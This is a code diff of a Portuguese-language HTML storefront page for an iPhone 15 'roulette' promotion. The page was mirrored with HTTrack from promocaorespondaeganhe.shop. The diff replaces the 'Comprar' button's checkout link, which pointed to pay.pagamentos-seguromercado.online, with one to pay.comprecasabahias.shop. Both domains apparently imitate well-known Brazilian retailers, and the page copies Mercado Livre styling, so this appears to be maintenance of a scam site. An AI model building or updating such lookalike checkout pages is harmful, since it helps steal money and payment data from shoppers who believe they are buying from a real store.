--- a/roleta/loja/iphone15/index.html
+++ b/roleta/loja/iphone15/index.html
@@ -115,11 +115,11 @@
             <span class="free-shipping2" style="font-family: 'GellixMedium';">Frete<span class="material-symbols-outlined" style="margin-right: 3px; color: #4caf50;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
          </div>
       </div>
-      <button class="pergunta-botao" href="#" onclick="window.open('https://pay.pagamentos-seguromercado.online/nQ7kZ7vYrKL30eJ' + window.location.search, '_self')">Comprar</button>
+      <button class="pergunta-botao" href="#" onclick="window.open('https://pay.comprecasabahias.shop/2wq7Grxl2jb3BAN' + window.location.search, '_self')">Comprar</button>
       <!--
       <div class="promocao">
          <p class="promotitle">Ofertas especiais 🔥</p>
-         <div class="button-container" href="#" onclick="window.open('https://pay.pagamentos-seguromercado.online/nQ7kZ7vYrKL30eJ' + window.location.search, '_self')">
+         <div class="button-container" href="#" onclick="window.open('https://pay.comprecasabahias.shop/2wq7Grxl2jb3BAN' + window.location.search, '_self')">
             <button class="styled-button" style="background-color: #ffffff;">
             <span class="button-text">
             <span class="button-title" style="color: #0169EB">LEVAR 3 UNIDADES</span>
@@ -219,7 +219,7 @@
          });
          document.getElementById("tv").addEventListener("click", timeTv);
       </script>
-   
+
 
 
 </body><!-- Mirrored from promocaorespondaeganhe.shop/produtos/celular-azul by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 14 Jul 2024 17:40:14 GMT --></html>
